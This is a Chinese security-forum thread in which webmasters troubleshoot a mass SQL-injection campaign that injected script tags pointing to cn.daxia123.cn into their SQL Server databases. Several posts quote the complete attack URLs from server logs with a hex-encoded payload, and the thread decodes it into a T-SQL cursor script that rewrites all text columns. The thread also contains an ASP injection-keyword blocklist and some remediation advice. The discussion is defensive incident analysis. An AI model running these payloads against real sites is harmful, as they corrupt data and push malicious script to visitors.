瑞星卡卡安全论坛

我的网站最近被“<script src=http://cn.daxia123.cn/cn.js></script>”修改了数据，每条信息（如果标题，内容）后面都此信息，并且是修改的数据库。我不知道恶人是能过什么方式修改我网站的数据库。请高手帮忙分析。你可以在google中输入<script src=http://cn.daxia123.cn/cn.js></script>代码，可以发现好多网站同样被做了修改，有的是在原有的图片路径加了此代码，使得图片无法显示，有的是在标题或内容加了此代码。使得面页极为零乱。

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.2; CIBA; 360SE)

该用户帖子内容已被屏蔽

我的网站没有这个功能啊！

我的网站也是碰到这样的问题了,现在也是急得如热锅上的蚂蚁....急呀,正在找解决办法...

继续楼上的回复，木马是这样的：
会定时不定时地修改数据库中的表，在标题部门或者内容部门，加上这一段代码，现在头痛了两天了，不知道是何原因，请高手们赐教！

有什么好的解决方法，我现在只能update数据库了

是有什么漏洞么，还是什么，我的DB是SQL server 2000

:default8:
我也网站也是.....痛苦ING.....

我们已经防止sql注入了，大家没有加的可以加上试试。
代码如下：但我们加的好像并不好使！
<%
dim sql_injdata
SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|daxia123|<script|/script>"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
        For Each SQL_Get In Request.QueryString
                For SQL_Data=0 To Ubound(SQL_inj)
                        if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
                                Response.Write "<Script Language='javascript'>alert('请不要在参数中包含非法字符尝试注入！');history.back(-1)</Script>"
                        Response.end
                        end if
                next
        Next
End If


If Request.Form<>"" Then
        For Each Sql_Post In Request.Form
                For SQL_Data=0 To Ubound(SQL_inj)
                        if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
                                Response.Write "<Script Language='javascript'>alert('请不要在参数中包含非法字符尝试注入！');history.back(-1)</Script>"
                                Response.end
                        end if
                next
        next
end if


%>

看来好多人中招了啊，我的也是，很头痛:default4: 一天要UPDATE几次数据库，网站都离不开人了

我用瑞星全盘杀毒，也用360扫描了，没发现病毒，我早前些挨过一次，恢复了之后，从昨天下午（12月25日）开始又中，还原数据库之后，过了不到半个小时又中了。
我总结一下我的情况：
我的网站用了sqlserver数据库、IIS、用了ISAPI_Rewrite路径重写（用不会有漏洞？），网站是自己开发的，做了关键字处理，论坛用了动网（php+mysql)论坛。
大家总结一下啊....

还想问一下，大家是不是都是在12月24号开始的啊，我的是12月24号下午3点11分发现的

加了一些反注入的代码，还是无济于事

我的网站现在被迫关闭了...痛苦....
猜测会不会是通过sql注入式攻击,但我们的代码已经进行防水处理了,不知道是从哪儿攻击网站的,大家多讨论讨论!

是啊，大家多多关注此帖子吧，顶上去，看看还有没有和我们遭遇相同的网站

目前发现一个问题了，是注入式攻击，通过对访问日志的查看，终于发现了访问有问题，来自IP-121.42.214.238（河北省邯郸市）的访问里面，有一段：
GET /news/more.asp classid=18;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- 80 - 121.42.214.238 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 404 0 3
里面明显地有注入的攻击代码。我猜想会不会是这个引起的病毒，而这一访问也和我的网站中病毒时间吻合，所以强烈建议大家检查你的网站，是不是对程序进行过防水处理了！

做了防水处理，还有中招的。。。
http://bbs.360safe.com/viewthread.php?tid=606369&extra=page%3D1&page=1
这里也有好多中招的

到目前为止，在系统没有病毒、没有漏洞的情况下，初步估计就是注入式攻击了。。。
我看日志里面，有大量的注入式访问记录，这些黑客估计就要一个页面一个页面地去尝试，网站只要有一个漏洞，就完了。。。。

最新的发现，又有了一个注入在进行  之前是cn.daxia123.cn，现在又出来了一个叫  cn.jxmmtv.com

不知道大家有没有外挂统计，有的话先在页面上去掉吧，我现在把统计都去掉了，如果再出问题真不知道怎么解决了，从昨天到现在，我把网站所有的页面都从新排查了一下，都做了反注入，但是今天没管用，现在能想到的只有统计没去掉了，大家试试，我希望能行，我也在观察行不行呢

看来跟统计也没有关系，不管用，刚刚又出现问题了

继续关注啊，网站真的是离不开人啦

台湾也有部份网站被害了

我的观察是，它不是病毒，只是单纯的用网址+参数就可以更新数据库里的数据


第一次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 AnD ''='

第二次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx%' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='

第三次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

第四次使用
[url=http://xxx.xxx.xxx/xxx.asp?xxx=xxx%]http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'[/url] ;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);-- aNd '%'='

第五次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx';dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

这些二进制编码是：
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

此种方法的破坏程度非常严重丫！！！

没有防止注入，总有一次会成功的
我数据库复原后，自己还傻傻的试了一次…又得重新复原一次
除了防止注入是否还有更好的办法呢？

最终报告，目前我的网站经过防水处理后，网站运行正常了，通过对客户注册攻击的日志看，在大量的注水代码，呵呵，注水攻击方式简单、可跨平台，黑客可能喜欢这样的攻击。
建议大家把防注水代码写到你的数据库打开的诸如conn.asp等页面，每次数据库打开的时候都验证数据的安全性！

转载：
我的观察是，它不是病毒，只是单纯的用网址+参数就可以更新数据库里的数据


第一次使用
[url]http://xxx.xxx.xxx/xxx.asp?xxx=xxx'[/url] AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 AnD ''='

第二次使用
[url]http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'[/url] AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='

第三次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

第四次使用
[url]http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'[/url] ;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);-- aNd '%'='

第五次使用
[url]http://xxx.xxx.xxx/xxx.asp?xxx=xxx'[/url];dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

这些二进制编码是：
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

此种方法的破坏程度非常严重丫！！！

我也中了这个大侠123的木马，我使用了一个暂时解决的办法,对vachar或nvachar字段长度做了限制，找出该字段最长的字段长度N，然后将该字段的最大长度设为N，发现效果还可以，至少已经有2天没有被注入了，其他如ntext或text字段的就做了一个触发器的限制,不允许插入script。

如果按13楼所说是2进制注入的话，我觉得可以通过判断post值的长度来临时解决，毕竟正常情况下不会传一个这么长的值吧

我的网站也这样了，和楼主一模一样，:default2:

看日志解释过来如下：这几句起什么作用的啊？那个长字符串是个什么意思？
'and (select char(94)+cast(count(1) as varchar(100))+char(94) from [master]..[sysdatabases])>0 and ''='

declare @S varchar(4000)
set @s=cast(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 as varchar(4000));
exec(@s);

那些二进制编码是：
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

就是把你数据库里符合条件的字段给update 加上 <script src=http://cn.daxia123.cn/cn.js></script>字符串

參考資料
http://blog.yam.com/yuchou/article/18968167

我们的网站也是这样的，始于12月初，也是cn.daxia123.cn/cn.js
但是不象是直接注入到数据库中，而是直接修改网站文件，不管怎么设NTFS权限，他都能修改，有时还能建立系统用户，不知道从哪里进来的。

把服务器上的数据库完全卸载，重装数据库，重新还原数据，
加上防注入代码，应该就可以了
我的站被daxia123整了2天2夜啊，刚刚还原,现在可以了